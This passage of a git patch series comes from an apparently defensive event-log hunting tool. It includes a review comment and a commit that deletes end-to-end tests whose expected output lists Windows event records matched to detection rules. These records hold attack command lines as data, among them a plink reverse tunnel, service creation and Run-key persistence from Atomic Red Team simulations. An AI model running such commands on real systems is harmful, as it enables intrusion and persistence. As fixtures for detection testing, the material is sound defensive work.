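Review bot: Changing `$crate::serde_json::to_writer` to `::serde_json::to_writer` in `cs_print_json!` (and `::serde_yaml::to_writer` in `cs_print_yaml!` in the next hunk) resolves the path in the calling crate now that the macros are `#[macro_export]`, so every downstream user must itself depend on `serde_json`/`serde_yaml` at a compatible version or the macro fails to expand. Keeping a `pub use serde_json;` / `pub use serde_yaml;` in the library root and writing `$crate::serde_json::to_writer(f, $value)?;` keeps the macros self-contained (the old `$crate::` path presumably relied on such a re-export). Since these macros are now public API, the `?` inside them, which only expands in a function returning a compatible `Result`, deserves a `///` line on each exported macro.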
@@ -161,7 +163,7 @@ macro_rules! cs_greenln { ($($arg:tt)*) => { use std::io::Write; unsafe { - match $crate::write::WRITER.output.as_ref() { + match $crate::WRITER.output.as_ref() { Some(mut f) => { f.write_all(format!($($arg)*).as_bytes()).expect("could not write to file"); f.write_all(b"\n").expect("could not write to file"); @@ -178,17 +180,18 @@ macro_rules! cs_greenln { macro_rules! cs_egreenln { ($($arg:tt)*) => { unsafe { - if !$crate::write::WRITER.quiet { + if !$crate::WRITER.quiet { colour::unnamed::ewrite(Some(colour::unnamed::Colour::Green), &format!($($arg)*), true); } } }; } +#[macro_export] macro_rules! cs_eyellowln { ($($arg:tt)*) => { unsafe { - if !$crate::write::WRITER.quiet { + if !$crate::WRITER.quiet { colour::unnamed::ewrite(Some(colour::unnamed::Colour::Yellow), &format!($($arg)*), true); } } @@ -199,7 +202,7 @@ macro_rules! cs_eyellowln { macro_rules! cs_eredln { ($($arg:tt)*) => { unsafe { - if !$crate::write::WRITER.quiet { + if !$crate::WRITER.quiet { colour::unnamed::ewrite(Some(colour::unnamed::Colour::Red), &format!($($arg)*), true); } } From b4d590ad646cbf3ee8163c0f048acf0d862308aa Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Thu, 2 Jun 2022 16:36:45 +0100 Subject: [PATCH 02/77] chore: clean up tests to work with the alpha --- e2e/README.md | 1 - e2e/e2e.sh | 20 - e2e/hunt_expected.json | 1 - e2e/search_expected.yml | 2197 --------------------------------------- src/lib.rs | 2 +- src/rule/mod.rs | 2 +- tests/convert.rs | 2 +- 7 files changed, 3 insertions(+), 2222 deletions(-) delete mode 100644 e2e/README.md delete mode 100755 e2e/e2e.sh delete mode 100644 e2e/hunt_expected.json delete mode 100644 e2e/search_expected.yml diff --git a/e2e/README.md b/e2e/README.md deleted file mode 100644 index 104c3b53..00000000 --- a/e2e/README.md +++ /dev/null @@ -1 +0,0 @@ -These are temporary tests until we can correctly test the parts of the code as desired. 
diff --git a/e2e/e2e.sh b/e2e/e2e.sh deleted file mode 100755 index fb1c4e28..00000000 --- a/e2e/e2e.sh +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/bash - -set -e - -SCRIPT_DIR=$( cd -- "$( dirname -- "${BASH_SOURCE[0]}" )" &> /dev/null && pwd ) - -echo "[!] Testing hunt..." - -cargo run -- hunt ${SCRIPT_DIR}/../evtx_attack_samples --mapping ${SCRIPT_DIR}/../mapping_files/sigma-mapping.yml --rules ${SCRIPT_DIR}/../sigma_rules -j > /tmp/chainsaw.json 2>/dev/null -diff /tmp/chainsaw.json ${SCRIPT_DIR}/hunt_expected.json -rm /tmp/chainsaw.json - -echo "[+] Success..." - -echo "[!] Testing search..." -cargo run -- search ${SCRIPT_DIR}/../evtx_attack_samples -i -s bypass > /tmp/chainsaw.yml 2>/dev/null -diff /tmp/chainsaw.yml ${SCRIPT_DIR}/search_expected.yml -rm /tmp/chainsaw.yml - -echo "[+] Success..." diff --git a/e2e/hunt_expected.json b/e2e/hunt_expected.json deleted file mode 100644 index bd5d4a62..00000000 --- a/e2e/hunt_expected.json +++ /dev/null 
@@ -1 +0,0 @@ -[{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":1102,"EventRecordID":227693,"Execution_attributes":{"ProcessID":820,"ThreadID":608},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-02-13T18:01:41.593830Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0xaf855","SubjectUserName":"admin01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1108"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Exfiltration and Tunneling Tools Execution"],"event":{"Event":{"EventData":{"CommandLine":"","NewProcessId":"0xcfc","NewProcessName":"C:\\Users\\user01\\Desktop\\plink.exe","ProcessId":"0xe60","SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x2ed80","SubjectUserName":"user01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1106","TokenElevationType":"%%1936"},"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":4688,"EventRecordID":227714,"Execution_attributes":{"ProcessID":4,"ThreadID":56},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider_attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"},"Security":null,"Task":13312,"TimeCreated_attributes":{"SystemTime":"2019-02-13T18:03:28.318440Z"},"Version":1}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Exfiltration and Tunneling Tools 
Execution"],"event":{"Event":{"EventData":{"CommandLine":"plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test","Company":"Simon Tatham","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Command-line SSH, Telnet, and Rlogin client","FileVersion":"Release 0.70","Hashes":"SHA1=7806AD24F669CD8BB9EBE16F87E90173047F8EE4","Image":"C:\\Users\\IEUser\\Desktop\\plink.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-D6AB-5C67-0000-002056660200","LogonId":"0x26656","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-D92A-5C67-0000-0010CB580900","ParentProcessId":3904,"ProcessGuid":"365ABB72-DFAD-5C67-0000-0010E0811500","ProcessId":2312,"Product":"PuTTY suite","RuleName":"","TerminalSessionId":1,"User":"PC01\\IEUser","UtcTime":"2019-02-16 10:02:21.934"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1940899,"Execution_attributes":{"ProcessID":1728,"ThreadID":412},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-02-16T10:02:21.934438Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-07-19 
14:43:46.619","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\phvj2yfb\\phvj2yfb.dll","UtcTime":"2019-07-19 14:43:46.619"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":3575,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:43:46.623217Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["New Service Creation"],"event":{"Event":{"EventData":{"CommandLine":"sc.exe create AtomicTestService binPath= C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Service Control Manager Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF","Image":"C:\\Windows\\System32\\sc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"sc.exe create AtomicTestService binPath= C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D738-5D31-0000-001046A02600","ParentProcessId":4216,"ProcessGuid":"747F3D96-D738-5D31-0000-001098A22600","ProcessId":1700,"Product":"Microsoft® Windows® Operating 
System","RuleName":"Persistence or Exec - Services Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:08.181"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3577,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:08.185344Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:08.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3578,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:08.221461Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult 
Malware"],"event":{"Event":{"EventData":{"Details":"C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ImagePath","UtcTime":"2019-07-19 14:44:08.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3579,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:08.240767Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Stop Windows Service"],"event":{"Event":{"EventData":{"CommandLine":"sc.exe stop AtomicTestService","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Service Control Manager Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF","Image":"C:\\Windows\\System32\\sc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"sc.exe stop AtomicTestService\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D739-5D31-0000-00104CB72600","ParentProcessId":5000,"ProcessGuid":"747F3D96-D739-5D31-0000-0010B6B92600","ProcessId":980,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence or Exec - Services 
Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:09.172"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3584,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:09.176040Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:09.291"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3587,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:09.310810Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD 
(0x00000002)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:26.166"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3589,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:26.222431Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ImagePath","UtcTime":"2019-07-19 14:44:26.166"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3590,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:26.246190Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD 
(0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:47.416"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3592,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:49.679320Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Reg Add RUN Key"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D765-5D31-0000-001027B72800","ProcessId":6584,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:53.201"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3593,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:53.219598Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Direct Autorun Keys Modification","Reg Add RUN Key"],"event":{"Event":{"EventData":{"CommandLine":"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D765-5D31-0000-001027B72800","ParentProcessId":6584,"ProcessGuid":"747F3D96-D765-5D31-0000-001086B92800","ProcessId":2068,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:44:53.244"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3594,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:53.258049Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Path\\AtomicRedTeam.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D765-5D31-0000-001086B92800","ProcessId":2068,"RuleName":"Persistence - via Run key","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Atomic Red Team","UtcTime":"2019-07-19 14:44:53.261"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3595,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:53.292455Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command 
Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D765-5D31-0000-0010D7BD2800","ProcessId":5824,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:53.314"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3596,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:53.330492Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D765-5D31-0000-0010D7BD2800","ParentProcessId":5824,"ProcessGuid":"747F3D96-D765-5D31-0000-001022C02800","ProcessId":2912,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:53.337"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3597,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:53.349171Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Reg Add RUN Key"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \" C:\\Path\\AtomicRedTeam.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D772-5D31-0000-0010BEE52800","ProcessId":3216,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 